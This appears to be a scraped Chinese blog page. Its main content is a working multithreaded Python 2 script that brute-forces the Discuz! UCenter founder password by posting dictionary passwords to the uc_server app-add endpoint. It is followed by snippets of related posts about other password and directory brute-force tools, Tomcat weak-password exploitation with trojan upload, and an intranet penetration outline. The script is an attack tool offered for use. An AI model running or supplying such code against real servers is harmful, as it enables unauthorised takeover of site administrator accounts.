Uc爆破工具

#coding:utf-8
import requests
import sys

from threading import Thread
from Queue import Queue

NUM=5

dicpath=‘password.txt‘

apptype=‘DISCUZX‘
appname=‘Discuz!‘
appurl=‘localhost‘
ucclientrelease=‘20110501‘

ucapi=‘http://127.0.0.1/uc_server‘  # no ‘/‘ in the end!!

def testucserver():
    try:
        t = requests.get(ucapi+‘/index.php?m=app&a=ucinfo&release=‘+ucclientrelease)
        if ‘UC_STATUS_OK‘ in t.text:
            return True
    except:
        pass
    return False

def brute():
    while True:
        founderpw=q.get()
        data={‘m‘:‘app‘,‘a‘:‘add‘,‘ucfounder‘:‘‘,‘ucfounderpw‘:founderpw,‘apptype‘:apptype,‘appname‘:appname,‘appurl‘:appurl,‘appip‘:‘‘,‘appcharset‘:‘gbk‘,‘appdbcharset‘:‘gbk‘,‘release‘:ucclientrelease}
        posturl=ucapi+‘/index.php‘
        #print posturl
        #print data
        r = requests.post(posturl,data)
        while r.status_code!=200:
            r = requests.post(posturl,data)
        rt=r.text
        #print rt
        if rt!=‘-1‘ and rt!=‘‘:
            print ‘Founder Password found! : ‘+founderpw
            print rt
            sys.exit()

        q.task_done()

if __name__ == ‘__main__‘:
    if testucserver()==False:
        print ‘UCAPI error‘
        sys.exit()
    q=Queue()
    for i in range(NUM):
        t = Thread(target=brute)
        t.daemon=True
        t.start()
    print ‘Threads started‘
    with open(dicpath) as f:
        for line in f:
            pw = line.strip()
            q.put(pw)
    f.close()
    q.join()

  

时间: 2024-10-05 04:55:54

Uc爆破工具的相关文章

python 写的http后台弱口令爆破工具

# -*- coding: utf-8 -*- # 利用python 写的多线程爆破后台用户名+密码(自备字典),比较实用,即使是在信息安全这么重视的今天,还是有人不加验证码或者异常访问限制之类的登陆验证方式,这样就很# 容易被弱口令爆破工具拿下,(本代码仅限学习实用,禁止进行web攻击,不承担法律责任) import urllib2 import urllib import httplib import threading headers = {"Content-Type":&quo

PJzhang:lijiejie的敏感目录爆破工具BBScan

猫宁!!! 参考链接: https://www.freebuf.com/sectool/85729.html https://segmentfault.com/a/1190000014539449 这个目录爆破工具使用的人也是挺多的,先用他的subdomainsbrute获取子域名,再用BBScan进行路径爆破,简单粗暴,一气呵成. lijiejie的博客:http://www.lijiejie.com/ BBScan现在已经更新到1.4版本了,最近一次更新是2019.05.13 BBScan

Oracle SID爆破工具SidGuess

在Oracle中,SID是System IDentifier的缩写.SID是一个数据库的唯一标识符.当用户希望远程连接Oracle数据库时,则需要知道SID.用户名.密码及服务器的IP地址.SidGuess就是一款根据字典爆破Oracle SID的工具.该工具的破解比较慢,每秒80-100个.该工具非常简单,格式如下: sidguess -i 服务器IP  -d SID字典文件

[原创]K8一句话密码爆破工具{秒破10万} 支持ASP/PHP/ASPX/JSP/CFM/DIY

工具: K8_FuckOneShell 20161224编译: VS2012  C# (.NET Framework v4.0)组织: K8搞基大队[K8team]作者: K8拉登哥哥博客: http://qqhack8.blog.163.com发布: 2016/12/24 13:32:04 简介: 采用多参数同时提交1000密码,本地内网测试10万/秒,3400万分别5-10分钟不等支持ASP/PHP/ASPX/JSP/CFM/等菜刀自定义一句话,无视GPC模式的PHP爆破 图片: 功能: 2

tomcat弱口令漏洞_爆破工具

有的时候我们会看到一个Tomcat的默认界面,到这里之后左侧的administrator有一个管理面板入口,这个时候我们是可以进行爆破的使用工具以及方法如下图: Apache Tomcat 写好ip之后点击添加如图: 然后我们到设置这里 默认的端口是8080,如果改变了我们就要编辑一下端口. 通过扫出来的密码进入后台之后上传一个war包,通过select war file to upload这块功能上传,上传之后就会遍历出来文件,然后点击就访问了木马. 我们根据上面的办法就考虑到了如何防护: 1

python 后台爆破工具(多线程)

非阻塞 q.put(item) 写入队列,timeout等待时间 q.put_nowait(item) 相当q.put(item, False) threads多线程     首先导入threading 模块,这是使用多线程的前提 appent 把每个线程放在threads列表里 start 开始 join 主线程等待子线程完成. #!/usr/bin/env python# -*- coding: utf-8 -*- import sysimport requestsimport Queuei

(转)ASPX一句话爆破工具

#include "stdafx.h" #include <stdio.h> #include <Windows.h> #include <stdlib.h> #include <string.h> #include <string> #include <winhttp.h> #pragma comment(lib,"winhttp.lib") void banner() //显示banner

python 后台爆破工具

sys:使用sys模块获得脚本的参数 queue模块,创建一个“队列”对象 time 模块     Python time time() 返回当前时间的时间戳(1970纪元后经过的浮点秒数). find()函数找不到时返回为-1 #!/usr/bin/env python# -*- coding: utf-8 -*- import sysimport requestsimport Queueimport time # 1315935012username = sys.argv[1]passwor

内网渗透+基础+工具使用=自己理解

目录 1.代理 2.内网命令 3.抓密码 4.ipc$共享目录利用 5.端口漏洞 6.溢出 1.代理 端口转发工具有很多比如:rebind2  eDuh  ssock  reDuh  lcx  socks5 等--.. 下面介绍我比较喜欢的2款工具LCX+ socks5 1.lcx 路由器加端口 TCP协议 ,固定IP地址本机 大马设置 Local Ip : 转发ip Local Port : 转发端口 Remote Ip :本机ip (ip138.com外网ip) Remote Port :